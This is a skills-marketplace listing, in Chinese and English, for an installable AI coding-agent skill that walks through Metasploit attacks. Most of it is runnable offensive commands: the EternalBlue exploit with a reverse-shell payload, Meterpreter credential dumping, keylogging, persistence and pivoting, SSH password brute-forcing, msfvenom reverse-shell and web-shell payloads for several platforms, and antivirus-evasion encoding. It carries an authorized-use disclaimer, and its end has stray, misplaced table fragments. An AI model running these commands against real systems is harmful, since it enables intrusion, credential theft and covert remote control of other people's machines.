metasploit-framework by sickn33/antigravity-awesome-skills
npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill metasploit-framework⚠️ 仅限授权使用 此技能仅用于教育目的或授权的安全评估。在使用此工具之前,必须获得系统所有者的明确书面许可。滥用此工具是非法的,严格禁止。
利用 Metasploit Framework 进行全面的渗透测试,从初始利用到利用后活动。Metasploit 为漏洞利用、载荷生成、辅助扫描以及在授权的安全评估期间维持对受入侵系统的访问提供了一个统一的平台。
# 在使用此技能之前,必须已安装 Metasploit。
# Kali Linux 通常预装了它。
msfconsole --version
安装方法因操作系统和软件包来源而异。在使用此技能之前,请遵循您平台的文档化包管理器或供应商安装流程。不要依赖此技能内部未固定的远程安装脚本。
如果您需要数据库支持的功能,例如工作区跟踪,请按照本地安装的说明初始化 msfdb。此技能假设 Metasploit 已可用,并且不需要 sudo、systemctl 或其他特权主机级设置步骤。
在运行利用模块之前,请要求用户确认确切的目标主机、范围和授权状态。
广告位招租
在这里展示您的产品或服务
触达数万 AI 开发者,精准高效
启动并导航 Metasploit 控制台:
# 启动 msfconsole
msfconsole
# 安静模式(跳过横幅)
msfconsole -q
# 基本导航命令
msf6 > help # 显示所有命令
msf6 > search [term] # 搜索模块
msf6 > use [module] # 选择模块
msf6 > info # 显示模块详细信息
msf6 > show options # 显示所需选项
msf6 > set [OPTION] [value] # 配置选项
msf6 > run / exploit # 执行模块
msf6 > back # 返回主控制台
msf6 > exit # 退出 msfconsole
了解不同的模块类别:
# 1. 利用模块 - 针对特定漏洞
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 2. 载荷模块 - 利用后执行的代码
msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 3. 辅助模块 - 扫描、模糊测试、枚举
msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version
# 4. 利用后模块 - 入侵后的操作
msf6 > show post
msf6 > use post/windows/gather/hashdump
# 5. 编码器 - 混淆载荷
msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai
# 6. Nops - 用于缓冲区溢出的无操作填充
msf6 > show nops
# 7. 规避模块 - 绕过安全控制
msf6 > show evasion
为目标查找合适的模块:
# 按名称搜索
msf6 > search eternalblue
# 按 CVE 搜索
msf6 > search cve:2017-0144
# 按平台搜索
msf6 > search platform:windows type:exploit
# 按类型和关键词搜索
msf6 > search type:auxiliary smb
# 按等级筛选(excellent, great, good, normal, average, low, manual)
msf6 > search rank:excellent
# 组合搜索
msf6 > search type:exploit platform:linux apache
# 查看搜索结果列:
# 名称、披露日期、等级、检查(是否可验证漏洞)、描述
设置要执行的利用:
# 选择利用模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 查看所需选项
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# 设置目标主机
msf6 exploit(...) > set RHOSTS 192.168.1.100
# 设置目标端口(如果与默认值不同)
msf6 exploit(...) > set RPORT 445
# 查看兼容的载荷
msf6 exploit(...) > show payloads
# 设置载荷
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 设置反向连接的本地主机
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# 再次查看所有选项以进行验证
msf6 exploit(...) > show options
# 检查目标是否易受攻击(如果支持)
msf6 exploit(...) > check
# 执行利用
msf6 exploit(...) > exploit
# 或
msf6 exploit(...) > run
根据情况选择合适的载荷:
# 独立载荷 - 自包含,无需分阶段
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp
# 分阶段载荷 - 小型载荷,用于下载更大的阶段
windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
# 阶段载荷 - 由分阶段载荷下载,提供完整功能
# Meterpreter, VNC, shell
# 载荷命名约定:
# [平台]/[架构]/[载荷类型]/[连接类型]
# 示例:
windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp
使用 Meterpreter 进行利用后操作:
# 成功利用后,您将获得 Meterpreter 提示符
meterpreter >
# 系统信息
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# 文件系统操作
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\
# 进程管理
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]
# 网络
meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
# 权限提升
meterpreter > getsystem
meterpreter > getprivs
# 凭据收集
meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
# 屏幕截图和键盘记录
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
# Shell 访问
meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >
# 后台会话
meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1
使用辅助模块进行侦察:
# SMB 版本扫描器
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# 端口扫描器
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run
# SSH 版本扫描器
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# FTP 匿名登录
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# HTTP 目录扫描器
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# 暴力破解模块
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run
在活动会话上运行利用后模块:
# 列出会话
msf6 > sessions -l
# 在特定会话上运行利用后模块
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run
# 或者直接从 Meterpreter 运行
meterpreter > run post/windows/gather/hashdump
# 常见的利用后模块
# 凭据收集
post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds
# 系统枚举
post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs
# 权限提升
post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester
# 持久化
post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence
# 横向移动
post/multi/manage/autoroute
创建独立的载荷:
# 基本的 Windows 反向 shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
# Linux 反向 shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
# PHP 反向 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
# Python 反向 shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
# PowerShell 载荷
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
# WAR 文件 (Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
# 编码载荷(规避杀毒软件)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# 列出可用格式
msfvenom --list formats
# 列出可用编码器
msfvenom --list encoders
配置监听器以接收传入连接:
# 手动处理器设置
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
# -j 标志以后台作业运行
msf6 > jobs -l
# 当载荷在目标上执行时,会话打开
[*] Meterpreter session 1 opened
# 与会话交互
msf6 > sessions -i 1
| 命令 | 描述 |
|---|---|
search [term] | 搜索模块 |
use [module] | 选择模块 |
info | 显示模块信息 |
show options | 显示可配置选项 |
set [OPT] [val] | 设置选项值 |
setg [OPT] [val] | 设置全局选项 |
run / exploit | 执行模块 |
check | 验证目标漏洞 |
back | 取消选择模块 |
sessions -l | 列出活动会话 |
sessions -i [N] | 与会话交互 |
jobs -l | 列出后台作业 |
db_nmap | 使用数据库运行 nmap |
| 命令 | 描述 |
|---|---|
sysinfo | 系统信息 |
getuid | 当前用户 |
getsystem | 尝试权限提升 |
hashdump | 转储密码哈希 |
shell | 切换到系统 shell |
upload/download | 文件传输 |
screenshot | 捕获屏幕 |
keyscan_start | 启动键盘记录器 |
migrate [PID] | 迁移到另一个进程 |
background | 后台会话 |
portfwd | 端口转发 |
# Windows
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms08_067_netapi
exploit/windows/http/iis_webdav_upload_asp
exploit/windows/local/bypassuac
# Linux
exploit/linux/ssh/sshexec
exploit/linux/local/overlayfs_priv_esc
exploit/multi/http/apache_mod_cgi_bash_env_exec
# Web 应用程序
exploit/multi/http/tomcat_mgr_upload
exploit/unix/webapp/wp_admin_shell_upload
exploit/multi/http/jenkins_script_console
| 问题 | 解决方案 |
|---|---|
| 数据库未连接 | 运行 sudo msfdb init,启动 PostgreSQL,然后运行 db_connect |
| 利用失败/无会话 | 运行 check;验证载荷架构;检查防火墙;尝试不同的载荷 |
| 会话立即死亡 | 迁移到稳定的进程;使用无阶段载荷;检查杀毒软件;使用 AutoRunScript |
| 载荷被杀毒软件检测到 | 使用编码 -e x86/shikata_ga_nai -i 10;使用规避模块;自定义模板 |
此技能适用于执行概述中描述的工作流程或操作。
每周安装数
93
仓库
GitHub 星标数
27.1K
首次出现
2026年2月21日
安全审计
安装于
opencode92
codex91
gemini-cli91
kimi-cli91
github-copilot91
cursor91
⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.
Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.
# Metasploit must already be installed before using this skill.
# Kali Linux usually ships with it preinstalled.
msfconsole --version
Installation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. Do not rely on an unpinned remote installer script from inside this skill.
If you want database-backed features such as workspace tracking, initialize msfdb using the instructions for your local installation. This skill assumes Metasploit is already available and does not require sudo, systemctl, or other privileged host-level setup steps.
Before running exploit modules, ask the user to confirm the exact target host, scope, and authorization state.
Launch and navigate the Metasploit console:
# Start msfconsole
msfconsole
# Quiet mode (skip banner)
msfconsole -q
# Basic navigation commands
msf6 > help # Show all commands
msf6 > search [term] # Search modules
msf6 > use [module] # Select module
msf6 > info # Show module details
msf6 > show options # Display required options
msf6 > set [OPTION] [value] # Configure option
msf6 > run / exploit # Execute module
msf6 > back # Return to main console
msf6 > exit # Exit msfconsole
Understand the different module categories:
# 1. Exploit Modules - Target specific vulnerabilities
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 2. Payload Modules - Code executed after exploitation
msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version
# 4. Post-Exploitation Modules - Actions after compromise
msf6 > show post
msf6 > use post/windows/gather/hashdump
# 5. Encoders - Obfuscate payloads
msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai
# 6. Nops - No-operation padding for buffer overflows
msf6 > show nops
# 7. Evasion - Bypass security controls
msf6 > show evasion
Find appropriate modules for targets:
# Search by name
msf6 > search eternalblue
# Search by CVE
msf6 > search cve:2017-0144
# Search by platform
msf6 > search platform:windows type:exploit
# Search by type and keyword
msf6 > search type:auxiliary smb
# Filter by rank (excellent, great, good, normal, average, low, manual)
msf6 > search rank:excellent
# Combined search
msf6 > search type:exploit platform:linux apache
# View search results columns:
# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description
Set up an exploit for execution:
# Select exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Set target host
msf6 exploit(...) > set RHOSTS 192.168.1.100
# Set target port (if different from default)
msf6 exploit(...) > set RPORT 445
# View compatible payloads
msf6 exploit(...) > show payloads
# Set payload
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Set local host for reverse connection
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# View all options again to verify
msf6 exploit(...) > show options
# Check if target is vulnerable (if supported)
msf6 exploit(...) > check
# Execute exploit
msf6 exploit(...) > exploit
# or
msf6 exploit(...) > run
Select appropriate payload for the situation:
# Singles - Self-contained, no staging
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp
# Stagers - Small payload that downloads larger stage
windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
# Stages - Downloaded by stager, provides full functionality
# Meterpreter, VNC, shell
# Payload naming convention:
# [platform]/[architecture]/[payload_type]/[connection_type]
# Examples:
windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp
Work with Meterpreter post-exploitation:
# After successful exploitation, you get Meterpreter prompt
meterpreter >
# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# File System Operations
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\
# Process Management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]
# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
# Privilege Escalation
meterpreter > getsystem
meterpreter > getprivs
# Credential Harvesting
meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
# Screenshots and Keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
# Shell Access
meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >
# Background Session
meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1
Use auxiliary modules for reconnaissance:
# SMB Version Scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# Port Scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run
# SSH Version Scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
# FTP Anonymous Login
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# HTTP Directory Scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
# Brute Force Modules
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run
Run post modules on active sessions:
# List sessions
msf6 > sessions -l
# Run post module on specific session
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run
# Or run directly from Meterpreter
meterpreter > run post/windows/gather/hashdump
# Common Post Modules
# Credential Gathering
post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds
# System Enumeration
post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs
# Privilege Escalation
post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester
# Persistence
post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence
# Pivoting
post/multi/manage/autoroute
Create standalone payloads:
# Basic Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
# PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
# WAR file (Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
# Encoded payload (evade AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# List available formats
msfvenom --list formats
# List available encoders
msfvenom --list encoders
Configure listener for incoming connections:
# Manual handler setup
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
# The -j flag runs as background job
msf6 > jobs -l
# When payload executes on target, session opens
[*] Meterpreter session 1 opened
# Interact with session
msf6 > sessions -i 1
| Command | Description |
|---|---|
search [term] | Search for modules |
use [module] | Select a module |
info | Display module information |
show options | Show configurable options |
set [OPT] [val] | Set option value |
setg [OPT] [val] | Set global option |
| Command | Description |
|---|---|
sysinfo | System information |
getuid | Current user |
getsystem | Attempt privilege escalation |
hashdump | Dump password hashes |
shell | Drop to system shell |
upload/download | File transfer |
# Windows
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms08_067_netapi
exploit/windows/http/iis_webdav_upload_asp
exploit/windows/local/bypassuac
# Linux
exploit/linux/ssh/sshexec
exploit/linux/local/overlayfs_priv_esc
exploit/multi/http/apache_mod_cgi_bash_env_exec
# Web Applications
exploit/multi/http/tomcat_mgr_upload
exploit/unix/webapp/wp_admin_shell_upload
exploit/multi/http/jenkins_script_console
| Issue | Solutions |
|---|---|
| Database not connected | Run sudo msfdb init, start PostgreSQL, then db_connect |
| Exploit fails/no session | Run check; verify payload architecture; check firewall; try different payloads |
| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |
| Payload detected by AV | Use encoding -e x86/shikata_ga_nai -i 10; use evasion modules; custom templates |
This skill is applicable to execute the workflow or actions described in the overview.
Weekly Installs
93
Repository
GitHub Stars
27.1K
First Seen
Feb 21, 2026
Security Audits
Gen Agent Trust HubPassSocketWarnSnykFail
Installed on
opencode92
codex91
gemini-cli91
kimi-cli91
github-copilot91
cursor91
Azure PostgreSQL 无密码身份验证配置指南:Entra ID 迁移与访问管理
34,800 周安装
run / exploit | Execute module |
check | Verify target vulnerability |
back | Deselect module |
sessions -l | List active sessions |
sessions -i [N] | Interact with session |
jobs -l | List background jobs |
db_nmap | Run nmap with database |
screenshot| Capture screen |
keyscan_start | Start keylogger |
migrate [PID] | Move to another process |
background | Background session |
portfwd | Port forwarding |